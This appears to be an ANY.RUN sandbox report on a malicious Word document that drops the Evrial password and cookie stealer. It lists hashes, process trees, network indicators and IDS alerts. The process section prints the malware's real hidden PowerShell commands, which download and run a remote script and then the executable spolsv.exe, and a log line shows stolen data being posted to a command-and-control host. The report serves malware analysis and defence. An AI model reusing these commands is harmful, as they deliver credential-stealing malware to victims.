analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Word.docx

Full analysis: https://app.any.run/tasks/58e331ea-240f-4993-965b-c83333b16017
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 22, 2019, 12:50:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
evasion
loader
trojan
stealer
evrial
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

24BA606C375B30C91BDE0F39D9B0C487

SHA1:

EC8069A1018ECD393651A336289E0814AE68A861

SHA256:

3B123029D8CAE41481216592CFE258C915F1B29FB9EBF6E4E4A5F2D3F9E2DA92

SSDEEP:

1536:mIeqlO63yVFxdRwxyBJVFfRGsnoTTYRTIm0DA0DoGQOw0DA:6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3124)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3100)
    • Application was dropped or rewritten from another process

      • spolsv.exe (PID: 3564)
    • Connects to CnC server

      • spolsv.exe (PID: 3564)
    • Actions looks like stealing of personal data

      • spolsv.exe (PID: 3564)
    • EVRIAL was detected

      • spolsv.exe (PID: 3564)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1288)
      • powershell.exe (PID: 3100)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3688)
      • powershell.exe (PID: 1288)
    • Application launched itself

      • powershell.exe (PID: 1288)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3100)
    • Reads Environment values

      • spolsv.exe (PID: 3564)
    • Reads the cookies of Google Chrome

      • spolsv.exe (PID: 3564)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3124)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3124)
    • Reads settings of System Certificates

      • powershell.exe (PID: 1288)
    • Application launched itself

      • chrome.exe (PID: 3712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2019:01:08 15:34:27
ZipCRC: 0x6cd2a4df
ZipCompressedSize: 1312
ZipUncompressedSize: 1312
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: -
Characters: -
Application: Microsoft Office Word
DocSecurity: None
Lines: -
Paragraphs: -
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: -
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: -
RevisionNumber: 1
CreateDate: 2017:10:27 22:23:00Z
ModifyDate: 2017:10:27 22:23:00Z

XMP

Title: -
Subject: -
Creator: -
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
63
Monitored processes
25
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe powershell.exe verclsid.exe no specs #EVRIAL spolsv.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winrar.exe no specs chrome.exe no specs PhotoViewer.dll no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3124"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Word.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3688"c:\Windows\Microsoft\OfficeWord.exe\..\..\..\..\windows\system32\cmd.exe" "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://iplogger.org/2LiCu5'); powershell $e #; exit".EXE Microsoft Updatec:\Windows\Microsoft\OfficeWord.exe\..\..\..\..\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1288powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://iplogger.org/2LiCu5'); powershell $e #; exit".EXE Microsoft UpdateC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3100"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$down = New-Object System.Net.WebClient $url = 'https://iplogger.org/2LcCu5' $file = 'spolsv.exe' Start-Sleep 6 $down.DownloadFile($url,$file) Start-Sleep 30 Start-Process 'spolsv.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2880"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401C:\Windows\system32\verclsid.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3564"C:\Users\admin\Desktop\spolsv.exe" C:\Users\admin\Desktop\spolsv.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Хост-процесс для служб Windows
Exit code:
3221225547
Version:
2.7.5.0
3712"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
68.0.3440.106
2468"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f3700b0,0x6f3700c0,0x6f3700ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3500"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3724 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
1132"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=952,15580927468654885118,4438510032940390772,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=18D932DE1E8A1E071893408D84A60F89 --mojo-platform-channel-handle=984 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
Total events
3 763
Read events
2 773
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
80
Text files
104
Unknown types
21

Dropped files

PID
Process
Filename
Type
3124WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8E4C.tmp.cvr
MD5:
SHA256:
1288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EDJ35QPDJS249IS2QWH1.temp
MD5:
SHA256:
3100powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8VT1RFDNFQ9LDLTS2S35.temp
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\mjtika4svld.fv
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\passwords.log
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\Files\Word.docx
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\Files\~$Word.docx
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\desktop.jpg
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\Cookies\Google_cookies.txt
MD5:
SHA256:
3564spolsv.exeC:\Users\admin\AppData\Local\Temp\2xms4f5mgcl\CC\Google_CC.txt
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
31
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3712
chrome.exe
GET
302
104.27.201.88:80
http://files.fm/
US
whitelisted
3564
spolsv.exe
POST
200
178.208.83.40:80
http://franziskastealer.mcdir.ru//stealer/files/upload.php?user=admin&hwid=90059C37132041A4B58D2B75A9850D2F
RU
malicious
1288
powershell.exe
GET
200
145.14.144.90:80
http://darwinism-headers.000webhostapp.com/ss
US
text
184 b
shared
3100
powershell.exe
GET
200
145.14.144.90:80
http://darwinism-headers.000webhostapp.com/spolsv
US
executable
240 Kb
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1288
powershell.exe
88.99.66.31:443
iplogger.org
Hetzner Online GmbH
DE
malicious
3100
powershell.exe
88.99.66.31:443
iplogger.org
Hetzner Online GmbH
DE
malicious
3564
spolsv.exe
178.208.83.40:80
franziskastealer.mcdir.ru
Webzilla B.V.
RU
malicious
1288
powershell.exe
145.14.144.90:80
darwinism-headers.000webhostapp.com
Hostinger International Limited
US
shared
3100
powershell.exe
145.14.144.90:80
darwinism-headers.000webhostapp.com
Hostinger International Limited
US
shared
3712
chrome.exe
172.217.16.163:443
www.google.de
Google Inc.
US
whitelisted
3712
chrome.exe
172.217.22.99:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3712
chrome.exe
172.217.21.195:443
www.gstatic.com
Google Inc.
US
whitelisted
3712
chrome.exe
172.217.21.238:443
apis.google.com
Google Inc.
US
whitelisted
3712
chrome.exe
172.217.22.4:443
www.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
iplogger.org
  • 88.99.66.31
shared
darwinism-headers.000webhostapp.com
  • 145.14.144.90
shared
franziskastealer.mcdir.ru
  • 178.208.83.40
malicious
clientservices.googleapis.com
  • 172.217.22.99
whitelisted
www.google.de
  • 172.217.16.163
whitelisted
www.gstatic.com
  • 172.217.21.195
whitelisted
safebrowsing.googleapis.com
  • 172.217.16.202
whitelisted
accounts.google.com
  • 172.217.16.141
shared
ssl.gstatic.com
  • 172.217.22.99
whitelisted
apis.google.com
  • 172.217.21.238
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
1288
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
1288
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious PowerShell download command
1288
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] System.Net.Downloader (Trojan.Chapak)
3100
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3100
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3100
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3100
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3564
spolsv.exe
A Network Trojan was detected
ET TROJAN Evrial Stealer CnC Activity
3 ETPRO signatures available at the full report
No debug info